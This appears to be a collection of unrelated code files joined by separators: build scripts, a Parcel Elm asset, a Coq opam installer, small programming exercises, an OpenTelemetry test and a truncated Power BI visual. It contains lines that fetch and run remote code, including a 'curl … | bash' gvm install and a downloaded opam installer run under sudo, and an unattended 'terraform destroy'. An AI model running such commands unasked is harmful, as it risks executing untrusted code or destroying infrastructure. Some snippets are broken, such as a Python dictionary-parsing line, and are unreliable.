$GCC/avr-objcopy -O ihex -R .eeprom $OUT/test_pwm.ino.elf $OUT/test_pwm.ino.hex
$GCC/avr-size $OUT/test_pwm.ino.elf
$GCC/avr-objdump -SC $OUT/test_pwm.ino.elf >$OUT/test_pwm.ino.lss
|
<reponame>ang-jason/fip_powerx_mini_projects-foxtrot<gh_stars>0
"use strict";
var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault");
var _asyncToGenerator2 = _interopRequireDefault(require("@babel/runtime/helpers/asyncToGenerator"));
const Asset = require('../Asset');
const commandExists = require('command-exists');
const localRequire = require('../utils/localRequire');
const _require = require('terser'),
minify = _require.minify;
const path = require('path');
const spawn = require('cross-spawn');
class ElmAsset extends Asset {
constructor(name, options) {
super(name, options);
this.type = 'js';
}
parse() {
var _this = this;
return (0, _asyncToGenerator2.default)(function* () {
let options = {
cwd: path.dirname(_this.name)
}; // If elm is not installed globally, install it locally.
try {
yield commandExists('elm');
} catch (err) {
yield localRequire('elm', _this.name);
options.pathToElm = path.join(path.dirname(require.resolve('elm')), 'bin', 'elm');
}
_this.elm = yield localRequire('node-elm-compiler', _this.name); // Ensure that an elm.json file exists, and initialize one if not.
let elmConfig = yield _this.getConfig(['elm.json'], {
load: false
});
if (!elmConfig) {
yield _this.createElmConfig(options); // Ensure we are watching elm.json for changes
yield _this.getConfig(['elm.json'], {
load: false
});
}
options.debug = !_this.options.production;
if (_this.options.minify) {
options.optimize = true;
}
let compiled = yield _this.elm.compileToString(_this.name, options);
_this.contents = compiled.toString();
if (_this.options.hmr) {
let _ref = yield localRequire('elm-hot', _this.name),
inject = _ref.inject;
_this.contents = inject(_this.contents);
}
})();
}
collectDependencies() {
var _this2 = this;
return (0, _asyncToGenerator2.default)(function* () {
let dependencies = yield _this2.elm.findAllDependencies(_this2.name);
var _iteratorNormalCompletion = true;
var _didIteratorError = false;
var _iteratorError = undefined;
try {
for (var _iterator = dependencies[Symbol.iterator](), _step; !(_iteratorNormalCompletion = (_step = _iterator.next()).done); _iteratorNormalCompletion = true) {
let dependency = _step.value;
_this2.addDependency(dependency, {
includedInParent: true
});
}
} catch (err) {
_didIteratorError = true;
_iteratorError = err;
} finally {
try {
if (!_iteratorNormalCompletion && _iterator.return != null) {
_iterator.return();
}
} finally {
if (_didIteratorError) {
throw _iteratorError;
}
}
}
})();
}
createElmConfig(options) {
return (0, _asyncToGenerator2.default)(function* () {
let cp = spawn(options.pathToElm || 'elm', ['init']);
cp.stdin.write('y\n');
return new Promise((resolve, reject) => {
cp.on('error', reject);
cp.on('close', function (code) {
if (code !== 0) {
return reject(new Error('elm init failed.'));
}
return resolve();
});
});
})();
}
generate() {
var _this3 = this;
return (0, _asyncToGenerator2.default)(function* () {
let output = _this3.contents;
if (_this3.options.minify) {
output = pack(output);
}
return {
[_this3.type]: output
}; // Recommended minification
// Based on:
// - http://elm-lang.org/0.19.0/optimize
function pack(source) {
let options = {
compress: {
keep_fargs: false,
passes: 2,
pure_funcs: ['F2', 'F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7', 'A8', 'A9'],
pure_getters: true,
unsafe: true,
unsafe_comps: true
},
mangle: true,
rename: false
};
let result = minify(source, options);
if (result.error) {
throw result.error;
}
return result.code;
}
})();
}
}
module.exports = ElmAsset; |
#!/bin/bash
###################### COPYRIGHT/COPYLEFT ######################
# (C) 2020 Michael Soegtrop
# Released to the public under the
# Creative Commons CC0 1.0 Universal License
# See https://creativecommons.org/publicdomain/zero/1.0/legalcode.txt
###################### INSTALL OPAM #####################
function run_opam_installer {
check_command_available curl
curl -sL https://raw.githubusercontent.com/ocaml/opam/master/shell/install.sh > opam_installer.sh
chmod a+x opam_installer.sh
if [[ "${COQREGTESTING:-n}" == y ]]
then
sudo sh -c 'yes "" | ./opam_installer.sh'
else
./opam_installer.sh
fi
rm opam_installer.sh
}
if ! command -v opam &> /dev/null
then
echo "===== INSTALLING OPAM ====="
if [[ "$OSTYPE" == linux* ]]
then
# On Linux use the opam install script - Linux has too many variants.
run_opam_installer
elif [[ "$OSTYPE" == darwin* ]]
then
# On macOS if a package manager is installed, use it - otherwise use the opam install script.
# The advantage of using a package manager is that opam is updated automatically.
if command -v port &> /dev/null
then
sudo port install opam
elif command -v brew &> /dev/null
then
brew install opam
else
run_opam_installer
fi
elif [[ "$OSTYPE" == cygwin ]]
then
# We want MinGW cross - this requires a special opam
wget https://github.com/fdopen/opam-repository-mingw/releases/download/0.0.0.2/opam$BITSIZE.tar.xz -O "opam$BITSIZE.tar.xz"
tar -xf "opam$BITSIZE.tar.xz"
bash opam$BITSIZE/install.sh --prefix "/usr/$(uname -m)-w64-mingw32/sys-root/mingw"
else
echo "ERROR: unsopported OS type '$OSTYPE'"
return 1
fi
echo "OPAM is now $(command -v opam) with version $(opam --version)"
else
echo "===== CHECKING VERSION OF INSTALLED OPAM ====="
# Note: on some OSes 2.0.5 is the latest available version and I am not aware that this does not work.
# The script is mostly tested with opam 2.0.7
# See https://opam.ocaml.org/doc/Install.html
if [ $(version_to_number $(opam --version)) -lt $(version_to_number 2.0.5) ]
then
echo "Your installed opam version $(opam --version) is older than 2.0.5."
echo "This version of opam is not supported."
echo "If you ininstall opam, this script will install the latest version."
return 1
else
echo "Found opam $(opam --version) - good!"
fi
fi
which opam
###################### CHECK SYSTEM SANDBOX VERSION #####################
ENABLE_SANDOX=Y
COQ_PLATFORM_OPAM_INIT_EXTRA=""
if [[ "$OSTYPE" == linux* ]]
then
if ! command -v bwrap &> /dev/null
then
echo "========================= BUBBLEWRAP SYSTEM SANDBOX ========================="
echo "You do not have the sandbox system 'bubblewrap' installed."
ENABLE_SANDOX=N
else
# This is the bwrap version on Ununtu 18.04 LTS, which seems to work
if [ $(version_to_number $(bwrap --version | cut -f 2 -d ' ')) -lt $(version_to_number 0.2.1) ]
then
echo "========================= BUBBLEWRAP SYSTEM SANDBOX ========================="
echo "Your version of the sandbox system 'bubblewrap' is too old."
echo "You have version $(bwrap --version | cut -f 2 -d ' ') but we need at least 0.2.1"
ENABLE_SANDOX=N
fi
fi
if [ $ENABLE_SANDOX == N ]
then
cat <<EOH
Updating or installing the bubblewrap sandbox on your system might be
difficult. Opam uses bubblewrap to make sure that make files access their
clocal build folders only, so that a gone wild "cd .. && rm -rf" in a
"make clean" does not erase your home folder. This is an extra sefety measure
and it is not strictly required. You have probably run "make" in some open
source software build folder before without using a sandbox. Opam has this
extra measure because it runs a lot of builds for many software packages,
which increases the risk.
You can either cancel and try to install or upgrade bubblewrap to at least
version 0.2.1, or you can run opam without sandbox.
========================= BUBBLEWRAP SYSTEM SANDBOX =========================
EOH
if [[ "${COQREGTESTING:-n}" == n ]]
then
ask_user_opt1_cancel "Disable sandbox (d) or cancel (c)?" dD "dsiable sandbox"
fi
COQ_PLATFORM_OPAM_INIT_EXTRA=--disable-sandboxing
fi
fi
###################### INITIALIZE OPAM #####################
if ! opam var root &> /dev/null
then
echo "===== INITIALIZING OPAM ====="
if [[ "$OSTYPE" == cygwin ]]
then
# Init opam with windows specific default repo
opam init --bare --shell-setup --enable-shell-hook --enable-completion --disable-sandboxing default 'https://github.com/fdopen/opam-repository-mingw.git#opam2'
else
opam init --bare --shell-setup --enable-shell-hook --enable-completion $COQ_PLATFORM_OPAM_INIT_EXTRA
fi
else
echo "===== opam already initialized ====="
fi
###################### CREATE OPAM SWITCH #####################
if ! opam switch $COQ_PLATFORM_SWITCH_NAME 2>/dev/null
then
echo "===== CREATE OPAM SWITCH ====="
if [[ "$OSTYPE" == cygwin ]]
then
if [ "`uname -m`" = "x86_64" ]; then
COQ_PLATFORM_OCAML_VERSION="ocaml-variants.4.07.1+mingw64c"
else
COQ_PLATFORM_OCAML_VERSION="ocaml-variants.4.07.1+mingw32c"
fi
else
COQ_PLATFORM_OCAML_VERSION='ocaml-base-compiler.4.07.1'
fi
# Register switch specific repo
# This repo shall always be specific to this switch - so delete it if it exists
$COQ_PLATFORM_TIME opam repo remove --all "patch$COQ_PLATFORM_SWITCH_NAME" || true
$COQ_PLATFORM_TIME opam repo add --dont-select "patch$COQ_PLATFORM_SWITCH_NAME" "file://$OPAMPACKAGES"
# Add the Coq repo - not a repo can be added many times as long as the URL is the same
$COQ_PLATFORM_TIME opam repo add --dont-select coq-core-dev "https://coq.inria.fr/opam/core-dev"
$COQ_PLATFORM_TIME opam repo add --dont-select coq-extra-dev "https://coq.inria.fr/opam/extra-dev"
$COQ_PLATFORM_TIME opam repo add --dont-select coq-released "https://coq.inria.fr/opam/released"
# Create switch with the patch repo registered right away in case we need to patch OCaml
$COQ_PLATFORM_TIME opam switch create $COQ_PLATFORM_SWITCH_NAME $COQ_PLATFORM_OCAML_VERSION --repositories="patch$COQ_PLATFORM_SWITCH_NAME",coq-core-dev,coq-extra-dev,coq-released,default
else
echo "===== opam switch already exists ====="
fi
###################### SELECT OPAM SWITCH #####################
opam switch $COQ_PLATFORM_SWITCH_NAME
eval $(opam env)
echo === OPAM REPOSITORIES ===
opam repo list
echo === OPAM PACKAGES ===
opam list
# Cleanup old build artifacts for current switch ###
# Note: this frequently proved to be required (build errors when doing experiments)
# Note: this keeps downloads and logs
opam clean --switch-cleanup
###################### HACK OPAM ARCHITECTURE ON 32 BIT CYGWIN #####################
# Note: opam running on 32 bit cygwin on 64 bit windows has arch x86_64
if [ "$OSTYPE" == cygwin ] && [ "$BITSIZE" == 32 ] && [ "$(opam var arch)" != i686 ]
then
conf_file="$(opam var prefix)"/.opam-switch/switch-config
# Search for "variables {", print it, print an additional variable assignment and continue with next line
# For everything else (condition 1) do the default action of print $0
awk '/^variables \{/ {print $0; print " arch: \"i686\""; next} 1' "$conf_file" > "$conf_file.tmp"
mv "$conf_file.tmp" "$conf_file"
fi
###################### Update opam ######################
echo "===== UPDATE OPAM REPOSITORIES ====="
if [ ! -f "$HOME/.opam_update_timestamp" ] || [ $(find "$HOME/.opam_update_timestamp" -mmin +60 -print) ]
then
$COQ_PLATFORM_TIME opam update
touch "$HOME/.opam_update_timestamp"
else
$COQ_PLATFORM_TIME opam update "patch$COQ_PLATFORM_SWITCH_NAME"
fi
|
GO_VERSION=1.17.3
if test ! $(which gvm)
then
echo "Installing gvm for you."
curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer | bash
source $HOME/.gvm/scripts/gvm
gvm install go${GO_VERSION}
gvm use go${GO_VERSION}
fi
|
echo -n "Enter deptno : "
read deptno
awk '$8=='$deptno'{print $2, $6, $8}' emp.txt
|
const checkNum = (input) => {
const parsedInput = parseInt(input); // parse input from string to number
if (isNaN(parsedInput)) {
return 'Input is not a number';
}
if (parsedInput % 2 === 0) {
return 'Input is even';
} else {
return 'Input is odd';
}
};
console.log(checkNum('2')); // Output: Input is even |
<reponame>JoaoHenriquePereira/currency-scrapper
/**
* Module dependencies.
*/
import _ from 'lodash';
import x from '../utils/xray';
import { Assert } from '../validator';
import { validate } from '../validator';
/**
* Get pair.
*/
async function getPair(pair) {
let url = `http://www.investing.com/currencies/${pair.join('-')}`;
let [bid, ask] = await x(url, '#quotes_summary_secondary_data', ['.inlineblock']);
if (!ask || !bid) {
url = `http://www.investing.com/currencies/${pair.reverse().join('-')}`;
[bid, ask] = await x(url, '#quotes_summary_secondary_data', ['.inlineblock']);
}
return _.object([pair.join('')], [{ ask, bid }]);
}
/**
* Export `ScrapCurrencyPairCommand`.
*/
export async function run(options) {
validate(options, { pair: [new Assert().Required(), new Assert().Count(2)] });
const { pair } = options;
return await getPair(pair);
}
|
/*
* Copyright (C) 2005-2017 by Centre National d'Etudes Spatiales (CNES)
*
* This file is licensed under MIT license:
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
#include <otb/SceneCoord.h>
#include <ossim/base/ossimDpt3d.h>
#include <ossim/base/ossimKeywordlist.h>
#include <ossim/base/ossimNotify.h>
#include <ossim/base/ossimString.h>
namespace ossimplugins
{
static const char SCENE_COORD[] = "sceneCoord";
static const char NUMBER_OF_SCENE_CORNER_COORD[] = "numberOfSceneCornerCoord";
static const char SCENE_CENTER_COORD[] = "sceneCenterCoord";
static const char SCENE_CORNER_COORD[] = "sceneCornerCoord";
SceneCoord::SceneCoord()
:
_numberOfSceneCoord(0),
_centerSceneCoord(),
_tabCornersSceneCoord()
{
}
SceneCoord::~SceneCoord()
{
}
SceneCoord::SceneCoord(const SceneCoord& rhs)
:
_numberOfSceneCoord(rhs._numberOfSceneCoord),
_centerSceneCoord(rhs._centerSceneCoord),
_tabCornersSceneCoord(rhs._tabCornersSceneCoord)
{
}
SceneCoord& SceneCoord::operator=(const SceneCoord& rhs)
{
if ( this != &rhs )
{
_numberOfSceneCoord = rhs._numberOfSceneCoord;
_centerSceneCoord = rhs._centerSceneCoord;
_tabCornersSceneCoord = rhs._tabCornersSceneCoord;
}
return *this;
}
bool SceneCoord::saveState(ossimKeywordlist& kwl, const char* prefix) const
{
std::string pfx("");
std::string pfx2("");
if (prefix)
{
pfx = prefix;
}
pfx += SCENE_COORD;
pfx2 = pfx;
pfx2 += ".";
kwl.add(pfx2.c_str(), NUMBER_OF_SCENE_CORNER_COORD, _numberOfSceneCoord);
std::string s = pfx + "." + SCENE_CENTER_COORD;
_centerSceneCoord.saveState(kwl, s.c_str());
std::string s2 =pfx + "." + SCENE_CORNER_COORD;
for (unsigned int i = 0; i < _tabCornersSceneCoord.size(); ++i)
{
std::string s3 = s2 + "[" + ossimString::toString(i).c_str() + "]";
_tabCornersSceneCoord[i].saveState(kwl, s3.c_str());
}
return true;
}
bool SceneCoord::loadState(const ossimKeywordlist& kwl, const char* prefix)
{
static const char MODULE[] = "SceneCoord::loadState";
bool result = true;
ossimString s;
const char* lookup = 0;
std::string pfx("");
if (prefix)
{
pfx = prefix;
}
pfx += SCENE_COORD;
pfx += ".";
lookup = kwl.find(pfx.c_str(), NUMBER_OF_SCENE_CORNER_COORD);
if (lookup)
{
s = lookup;
_numberOfSceneCoord = s.toUInt32();
}
else
{
ossimNotify(ossimNotifyLevel_WARN)
<< MODULE << " Keyword not found: " << NUMBER_OF_SCENE_CORNER_COORD << " in "<<pfx <<" path.\n";
result = false;
}
std::string s1 = pfx + SCENE_CENTER_COORD;
result = _centerSceneCoord.loadState(kwl, s1.c_str());
_tabCornersSceneCoord.clear();
std::string s2 = pfx + SCENE_CORNER_COORD;
for (unsigned int i = 0; i < _numberOfSceneCoord; ++i)
{
std::string s3 = s2 + "[" + ossimString::toString(i).c_str() + "]";
InfoSceneCoord isc;
result = isc.loadState(kwl, s3.c_str());
_tabCornersSceneCoord.push_back(isc);
}
if( _numberOfSceneCoord != _tabCornersSceneCoord.size() )
{
ossimNotify(ossimNotifyLevel_WARN)
<< MODULE << " Keyword " << NUMBER_OF_SCENE_CORNER_COORD << " is different with the number of _tabCornersScenceCoord nodes \n";
}
return result;
}
std::ostream& SceneCoord::print(std::ostream& out) const
{
out << setprecision(15) << setiosflags(ios::fixed)
<< "\n SceneCoord class data members:\n";
const char* prefix = 0;
ossimKeywordlist kwl;
ossimString pfx;
pfx += SCENE_COORD;
ossimString s = pfx + "." + NUMBER_OF_SCENE_CORNER_COORD;
kwl.add(prefix, s.c_str(), _numberOfSceneCoord);
ossimString s1 = pfx + "." + SCENE_CENTER_COORD;
_centerSceneCoord.saveState(kwl, s1.c_str());
ossimString s2 =pfx + "." + SCENE_CORNER_COORD;
for (unsigned int i = 0; i < _tabCornersSceneCoord.size(); ++i)
{
ossimString s3 = s2 + "[" + ossimString::toString(i) + "]";
_tabCornersSceneCoord[i].saveState(kwl, s3.c_str());
}
out << kwl;
return out;
}
}
|
def get_max_value(d):
max_value = float('-inf')
for key, value in d.items():
if value > max_value:
max_value = value
return max_value
if __name__ == '__main__':
d = dict(map(str, input('Please enter a dictionary: ').split(',')))
output = get_max_value(d)
print('The maximum value in the dictionary is ', output) |
<gh_stars>0
package ru.stqa.pft.addressbook.tests;
import org.testng.annotations.Test;
import ru.stqa.pft.addressbook.model.ContactData;
import java.util.Arrays;
import java.util.stream.Collectors;
import static org.hamcrest.CoreMatchers.*;
import static org.hamcrest.MatcherAssert.*;
public class ContactTests extends TestBase {
@Test
public void testContact() {
app.goTo().gotoHomePage();
ContactData contact = app.contact().all().iterator().next();
ContactData contactInfoFromEditForm = app.contact().infoFromEditForm(contact);
assertThat(contact.getAllphones(), equalTo(mergePhones(contactInfoFromEditForm)));
assertThat(contact.getAddress(), equalTo(mergeAddress(contactInfoFromEditForm)));
assertThat(contact.getAllemails(), equalTo(mergeEmails(contactInfoFromEditForm)));
}
private String mergePhones(ContactData contact) {
return Arrays.asList(contact.getHomephone(), contact.getMobilephone(), contact.getWorkphone(), contact.getSecondphone())
.stream()
.map(ContactTests::cleaned)
.filter(s -> !s.equals("")).collect(Collectors.joining("\n"));
}
private String mergeAddress(ContactData contact) {
return Arrays.asList(contact.getAddress())
.stream()
.filter(s -> !s.equals("")).collect(Collectors.joining(""));
}
private String mergeEmails(ContactData contact) {
return Arrays.asList(contact.getEmail1(), contact.getEmail2(), contact.getEmail3())
.stream()
.filter(s -> !s.equals("")).collect(Collectors.joining("\n"));
}
public static String cleaned(String phone) {
return phone.replaceAll("\\s", "").replaceAll("[-()]", "");
}
} |
/*
statsd daemon configuration reference:
https://github.com/statsd/statsd/blob/master/exampleConfig.js
elasticsearch-statsd-backend configuration reference:
https://github.com/reconbot/elasticsearch-statsd-backend
*/
module.exports = {
port: process.env.STATSD_PORT || 8125,
backends: [ 'elasticsearch-statsd-backend' ],
elasticsearch: {
url: process.env.ES_URL || 'http://localhost:9200',
indexPrefix: process.env.ES_INDEX_PREFIX || "statsd-",
// shutdown on template failure unless explicitly marked optional
shutdownOnStartupError: process.env.ES_TEMPLATES_OPTIONAL !== 'true',
// "months" => ${indexPrefix}-${YYYY-MM}
// "day" => ${indexPrefix}-${YYYY-MM-DD}
// "hour" => ${indexPrefix}-${YYYY-MM-DDTHH}
indexTimestamp: process.env.ES_INDEX_TIMESTAMP || 'day',
counterIndexName: process.env.ES_COUNTER_INDEX || 'counter',
timerIndexName: process.env.ES_TIMER_INDEX || 'timer',
gaugeIndexName: process.env.ES_GAUGE_INDEX || 'gauge',
setIndexName: process.env.ES_SET_INDEX || 'set',
// parse any JSON object index templates provided
counterTemplate: process.env.ES_COUNTER_TEMPLATE ? JSON.parse(process.env.ES_COUNTER_TEMPLATE): undefined,
timerTemplate: process.env.ES_TIMER_TEMPLATE ? JSON.parse(process.env.ES_TIMER_TEMPLATE): undefined,
gaugeTemplate: process.env.ES_GAUGE_TEMPLATE ? JSON.parse(process.env.ES_GAUGE_TEMPLATE): undefined,
setTemplate: process.env.ES_SET_TEMPLATE ? JSON.parse(process.env.ES_SET_TEMPLATE): undefined,
}
}
|
<filename>sdk/resource/container_test.go
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package resource
import (
"errors"
"io"
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
func setDefaultContainerProviders() {
setContainerProviders(
getContainerIDFromCGroup,
)
}
func setContainerProviders(
idProvider containerIDProvider,
) {
containerID = idProvider
}
func TestGetContainerIDFromLine(t *testing.T) {
testCases := []struct {
name string
line string
expectedContainerID string
}{
{
name: "with suffix",
line: "13:name=systemd:/podruntime/docker/kubepods/ac679f8a8319c8cf7d38e1adf263bc08d23.aaaa",
expectedContainerID: "ac679f8a8319c8cf7d38e1adf263bc08d23",
},
{
name: "with prefix and suffix",
line: "13:name=systemd:/podruntime/docker/kubepods/crio-dc679f8a8319c8cf7d38e1adf263bc08d23.stuff",
expectedContainerID: "dc679f8a8319c8cf7d38e1adf263bc08d23",
},
{
name: "no prefix and suffix",
line: "13:name=systemd:/pod/d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
expectedContainerID: "d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
},
{
name: "with space",
line: " 13:name=systemd:/pod/d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356 ",
expectedContainerID: "d86d75589bf6cc254f3e2cc29debdf85dde404998aa128997a819ff991827356",
},
{
name: "invalid hex string",
line: "13:name=systemd:/podruntime/docker/kubepods/ac679f8a8319c8cf7d38e1adf263bc08d23zzzz",
},
{
name: "no container id - 1",
line: "pids: /",
},
{
name: "no container id - 2",
line: "pids: ",
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
containerID := getContainerIDFromLine(tc.line)
assert.Equal(t, tc.expectedContainerID, containerID)
})
}
}
func TestGetContainerIDFromReader(t *testing.T) {
testCases := []struct {
name string
reader io.Reader
expectedContainerID string
}{
{
name: "multiple lines",
reader: strings.NewReader(`//
1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d23
1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d24
`),
expectedContainerID: "dc579f8a8319c8cf7d38e1adf263bc08d23",
},
{
name: "no container id",
reader: strings.NewReader(`//
1:name=systemd:/podruntime/docker
`),
expectedContainerID: "",
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
containerID := getContainerIDFromReader(tc.reader)
assert.Equal(t, tc.expectedContainerID, containerID)
})
}
}
func TestGetContainerIDFromCGroup(t *testing.T) {
t.Cleanup(func() {
osStat = defaultOSStat
osOpen = defaultOSOpen
})
testCases := []struct {
name string
cgroupFileNotExist bool
openFileError error
content string
expectedContainerID string
expectedError bool
}{
{
name: "the cgroup file does not exist",
cgroupFileNotExist: true,
},
{
name: "error when opening cgroup file",
openFileError: errors.New("test"),
expectedError: true,
},
{
name: "cgroup file",
content: "1:name=systemd:/podruntime/docker/kubepods/docker-dc579f8a8319c8cf7d38e1adf263bc08d23",
expectedContainerID: "dc579f8a8319c8cf7d38e1adf263bc08d23",
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
osStat = func(name string) (os.FileInfo, error) {
if tc.cgroupFileNotExist {
return nil, os.ErrNotExist
}
return nil, nil
}
osOpen = func(name string) (io.ReadCloser, error) {
if tc.openFileError != nil {
return nil, tc.openFileError
}
return io.NopCloser(strings.NewReader(tc.content)), nil
}
containerID, err := getContainerIDFromCGroup()
assert.Equal(t, tc.expectedError, err != nil)
assert.Equal(t, tc.expectedContainerID, containerID)
})
}
}
|
function findLargestValue(arr) {
let largestValue = arr[0];
for (let i=1; i < arr.length; i++) {
if (arr[i] > largestValue) {
largestValue = arr[i];
}
}
return largestValue;
}
const result = findLargestValue([1, 2, 3, 4, 5]);
console.log(result); |
package fr.syncrase.ecosyst.domain.classification.entities.mappers;
import fr.syncrase.ecosyst.domain.classification.entities.IUrl;
import fr.syncrase.ecosyst.domain.classification.entities.database.Url;
import org.jetbrains.annotations.NotNull;
public class UrlMapper {
// public AtomicUrl get(@NotNull Url url) {
// return new AtomicUrl(url.getUrl(), url.getId());
// }
public static Url get(@NotNull IUrl url) {
return new Url(url.getUrl(), url.getId());
}
}
|
SELECT first_name, last_name FROM people WHERE age BETWEEN 18 AND 40; |
public String reverseString(String str) {
StringBuilder builder = new StringBuilder();
for (int i = str.length() - 1; i >= 0; --i) {
builder.append(str.charAt(i));
}
return builder.toString();
} |
package main
import (
"fmt"
"github.com/roylee0704/gron"
"sync"
"time"
)
/*
1.c.Add(gron.Every(), j Job)
1.1 Job是一个接口类型,只要实现了Run方法则实现了Job接口,c.Add第二个参数接收任意实现了Job接口的结构体对象
type Job interface{
Run()
}
1.2 实现Job接口示例:
type Test struct{}
func (t Test) Run() {xxx}
1.3 调用Add方法
t := Test{}
c.Add(gron.Every(5*time.Second), t)
*/
type GreetingJob struct {
Name string
}
func (g GreetingJob) Run() {
fmt.Println("Hello ", g.Name)
}
func main() {
var wg sync.WaitGroup
wg.Add(1)
g1 := GreetingJob{Name: "lh"}
g2 := GreetingJob{Name: "ls"}
c := gron.New()
c.Add(gron.Every(5*time.Second), g1)
c.Add(gron.Every(10*time.Second), g2)
c.Start()
wg.Wait()
}
|
#!/bin/bash
cd terraform && terraform destroy -auto-approve
|
<reponame>bianjieai/iobscan-ibc-explorer-backend<filename>src/monitor/ibc_monitor.service.test.ts<gh_stars>1-10
import {IbcMonitorService} from "../monitor/ibc_monitor.service";
import {Test} from "@nestjs/testing";
import {AppModule} from "../app.module";
describe('IbcMonitorService', () => {
let ibcMonitorService: IbcMonitorService;
beforeEach(async () => {
const module = await Test.createTestingModule({
imports: [
AppModule
]
}).compile();
ibcMonitorService = module.get<IbcMonitorService>(IbcMonitorService);
})
describe('getProcessingCnt', () => {
it('getProcessingCnt Test', async () => {
const result = await ibcMonitorService.getProcessingCnt()
console.log(result, '----')
});
});
describe('getNodeInfo', () => {
it('getNodeInfo Test', async () => {
const result = await ibcMonitorService.getNodeInfo("https://cosmoshub.stakesystems.io/","cosmoshub_4")
console.log(result, '----')
});
});
})
|
import java.util.StringTokenizer;
public class ReverseWords
{
static void reverseWord(String str)
{
StringTokenizer st = new StringTokenizer(str," ");
String strrev = "";
while(st.hasMoreTokens())
{
StringBuilder sb = new StringBuilder();
sb.append(st.nextToken());
sb.reverse();
sb.append(" ");
strrev += sb.toString();
}
System.out.print(strrev);
}
public static void main(String[] args)
{
String str = "Hello World";
reverseWord(str);
}
} |
<gh_stars>1-10
export function validatePassword(value: string | undefined): string | undefined {
if (typeof value !== 'undefined') {
const errorMessage = (() => {
const trimmedValue = value.trim();
let error = '';
if (trimmedValue.length < 6) {
error = `Passwords must be at least 6 characters.\n`;
}
if (!/[^a-zA-Z0-9]/.test(trimmedValue)) {
error = `${error}Passwords must have at least one non alphanumeric character.\n`;
}
if (!/[a-z]/.test(trimmedValue)) {
error = `${error}Passwords must have at least one lowercase ('a'-'z').\n`;
}
if (!/[A-Z]/.test(trimmedValue)) {
error = `${error}Passwords must have at least one uppercase('A'-'Z').\n`;
}
if (!/[0-9]/.test(trimmedValue)) {
error = `${error}Passwords must have at least one digit ('0'-'9').\n`;
}
return error;
})();
return errorMessage.length > 0 ? errorMessage : undefined;
}
}
|
/*
* Power BI Visualizations
*
* Copyright (c) Microsoft Corporation
* All rights reserved.
* MIT License
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the ""Software""), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
import {
interactivitySelectionService,
interactivityBaseService
} from "powerbi-visuals-utils-interactivityutils";
import { Selection, select } from "d3-selection";
import { MekkoChartColumnDataPoint } from "./../dataInterfaces";
import { VisualBehaviorOptions } from "./visualBehaviorOptions";
import * as utils from "./../utils";
// powerbi.extensibility.utils.interactivity
import ISelectionHandler = interactivityBaseService.ISelectionHandler;
import IInteractiveBehavior = interactivityBaseService.IInteractiveBehavior;
import SelectionDataPoint = interactivitySelectionService.SelectableDataPoint;
const getEvent = () => require("d3-selection").event;
export class VisualBehavior implements IInteractiveBehavior {
private options: VisualBehaviorOptions;
public bindEvents(
options: VisualBehaviorOptions,
selectionHandler: ISelectionHandler): void {
this.options = options;
const eventGroup: Selection<any, any, any, any> = options.eventGroup;
eventGroup.on("click", function () {
const dataOfTheLastEvent: SelectionDataPoint = VisualBehavior.getDatumForLastInputEvent();
selectionHandler.handleSelection(
dataOfTheLastEvent,
(getEvent() as MouseEvent).ctrlKey);
});
eventGroup.on("contextmenu", function () {
const mouseEvent: MouseEvent = getEvent() as MouseEvent;
if (mouseEvent.ctrlKey) {
return;
}
mouseEvent.preventDefault();
});
}
public renderSelection(hasSelection: boolean): void {
